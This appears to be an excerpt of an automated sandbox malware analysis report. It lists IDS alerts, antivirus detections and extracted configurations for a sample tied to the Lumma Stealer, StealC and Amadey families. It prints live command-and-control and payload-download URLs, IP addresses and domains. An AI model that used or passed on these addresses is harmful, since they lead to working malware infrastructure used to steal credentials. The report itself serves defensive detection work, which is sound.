2024-11-11T01:16:07.014339+0100	2028371	3	Unknown Traffic	192.168.2.4	50063	188.114.96.3	443	TCP
2024-11-11T01:16:08.421325+0100	2028371	3	Unknown Traffic	192.168.2.4	50064	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:40.322851+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50011	188.114.96.3	443	TCP
2024-11-11T01:15:41.447049+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50021	188.114.96.3	443	TCP
2024-11-11T01:15:52.642458+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50046	188.114.96.3	443	TCP
2024-11-11T01:15:53.834816+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50047	188.114.96.3	443	TCP
2024-11-11T01:15:54.867149+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50049	188.114.96.3	443	TCP
2024-11-11T01:16:01.609726+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50056	188.114.96.3	443	TCP
2024-11-11T01:16:05.955584+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50059	188.114.96.3	443	TCP
2024-11-11T01:16:06.275206+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50061	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:40.322851+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50011	188.114.96.3	443	TCP
2024-11-11T01:15:52.642458+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50046	188.114.96.3	443	TCP
2024-11-11T01:16:01.609726+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50056	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:41.447049+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50021	188.114.96.3	443	TCP
2024-11-11T01:15:53.834816+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50047	188.114.96.3	443	TCP
2024-11-11T01:16:06.275206+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50061	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:39.597351+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50011	188.114.96.3	443	TCP
2024-11-11T01:15:40.975986+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50021	188.114.96.3	443	TCP
2024-11-11T01:15:42.219565+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50028	188.114.96.3	443	TCP
2024-11-11T01:15:44.057271+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50039	188.114.96.3	443	TCP
2024-11-11T01:15:45.882560+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50040	188.114.96.3	443	TCP
2024-11-11T01:15:47.505855+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50041	188.114.96.3	443	TCP
2024-11-11T01:15:49.406213+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50043	188.114.96.3	443	TCP
2024-11-11T01:15:52.171144+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50046	188.114.96.3	443	TCP
2024-11-11T01:15:53.363072+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50047	188.114.96.3	443	TCP
2024-11-11T01:15:54.158990+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50049	188.114.96.3	443	TCP
2024-11-11T01:15:54.589427+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50050	188.114.96.3	443	TCP
2024-11-11T01:15:55.827242+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50053	188.114.96.3	443	TCP
2024-11-11T01:15:57.102595+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50054	188.114.96.3	443	TCP
2024-11-11T01:15:59.943137+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50055	188.114.96.3	443	TCP
2024-11-11T01:16:01.100903+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50056	188.114.96.3	443	TCP
2024-11-11T01:16:01.434055+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50057	188.114.96.3	443	TCP
2024-11-11T01:16:05.494477+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50059	188.114.96.3	443	TCP
2024-11-11T01:16:05.749423+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50061	188.114.96.3	443	TCP
2024-11-11T01:16:07.014339+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50063	188.114.96.3	443	TCP
2024-11-11T01:16:08.421325+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.4	50064	188.114.96.3	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:14.469285+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49870	185.215.113.43	80	TCP
2024-11-11T01:15:40.942817+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50015	185.215.113.43	80	TCP
2024-11-11T01:15:50.396472+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50044	185.215.113.43	80	TCP
2024-11-11T01:15:54.378335+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50048	185.215.113.43	80	TCP
2024-11-11T01:16:02.286514+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50058	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:38.817886+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	51372	1.1.1.1	53	UDP
2024-11-11T01:15:51.425771+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	61073	1.1.1.1	53	UDP
2024-11-11T01:16:00.181317+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	58588	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:38.841424+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	62738	1.1.1.1	53	UDP
2024-11-11T01:15:51.449666+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	55775	1.1.1.1	53	UDP
2024-11-11T01:16:00.318058+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	57240	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:38.913538+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.4	63719	1.1.1.1	53	UDP
2024-11-11T01:15:51.543398+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.4	57650	1.1.1.1	53	UDP
2024-11-11T01:16:00.449078+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.4	52958	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:38.937762+0100	2057119	1	Domain Observed Used for C2 Detected	192.168.2.4	63369	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:38.889103+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	57491	1.1.1.1	53	UDP
2024-11-11T01:15:51.517450+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	52540	1.1.1.1	53	UDP
2024-11-11T01:16:00.423902+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	65014	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:38.791158+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	56413	1.1.1.1	53	UDP
2024-11-11T01:15:51.400667+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	64360	1.1.1.1	53	UDP
2024-11-11T01:16:00.143098+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	51085	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:38.864888+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	64560	1.1.1.1	53	UDP
2024-11-11T01:15:51.473263+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	62669	1.1.1.1	53	UDP
2024-11-11T01:16:00.388247+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	58526	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:14:00.362393+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:14:00.356248+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:14:00.639818+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:14:01.730202+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:14:00.646442+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:44.961384+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50039	188.114.96.3	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:14:00.073138+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-11T01:15:49.765210+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50042	185.215.113.206	80	TCP
2024-11-11T01:16:06.228236+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50060	185.215.113.206	80	TCP
2024-11-11T01:16:09.498244+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50065	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:06.417455+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49825	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:13.562980+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49838	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:15:10.060966+0100	2803305	3	Unknown Traffic	192.168.2.4	49846	87.236.16.19	80	TCP
2024-11-11T01:15:15.385626+0100	2803305	3	Unknown Traffic	192.168.2.4	49876	185.215.113.16	80	TCP
2024-11-11T01:15:41.863572+0100	2803305	3	Unknown Traffic	192.168.2.4	50022	185.215.113.16	80	TCP
2024-11-11T01:15:55.295498+0100	2803305	3	Unknown Traffic	192.168.2.4	50051	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T01:14:02.245750+0100	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-11T01:14:15.136134+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:16.245947+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:16.723298+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:17.170704+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:17.928879+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:18.251484+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:22.213044+0100	2803304	3	Unknown Traffic	192.168.2.4	49762	185.215.113.16	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.16/c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb4uX	Avira URL Cloud: Label: phishing
Source: http://mncrafter.ru/test2.exev=	Avira URL Cloud: Label: malware
Source: http://mncrafter.ru/test2.exe#=	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exe4c613	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllM	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpation	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php$	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php9z	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dlli	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpiF	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/luma/random.exe1	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.phpH	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllQ	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe613a	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/off/random.exeI	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php2g	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe1395d7	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe61395dC	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/mine/random.exeK	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/off/random.exec61395dE	Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.phpI	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exes	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllA	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllM	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe15001	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dll_	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpMy	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpSession	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe)	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 0000000C.00000002.2928876012.00000000007B1000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: file.exe.7312.0.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Multi AV Scanner detection for domain / URL

Source: mncrafter.ru	Virustotal: Detection: 10%			Perma Link
Source: http://mncrafter.ru/test2.exe#=	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\test2[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1005417001\c511421282.exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 42%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1005417001\c511421282.exe	Joe Sandbox ML: detected
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C72A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C724440 PK11_PrivDecrypt,	0_2_6C724440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C6F4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7244C0 PK11_PubEncrypt,	0_2_6C7244C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C7725B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C708670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C708670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C72A650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C70E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C74A730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C750180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C750180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7243B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6C7243B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C747C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6C747C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C707D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6C707D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6C74BD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C749EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6C749EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C723FF0 PK11_PrivDecryptPKCS1,	0_2_6C723FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C723850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C723850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C729840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6C729840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74DA40 SEC_PKCS7ContentIsEncrypted,	0_2_6C74DA40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C757410 NSS_SecureMemcmp,PR_SetError,PK11_Decrypt,	0_2_6C757410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C723560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C723560

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50050 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50055 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50061 version: TLS 1.2
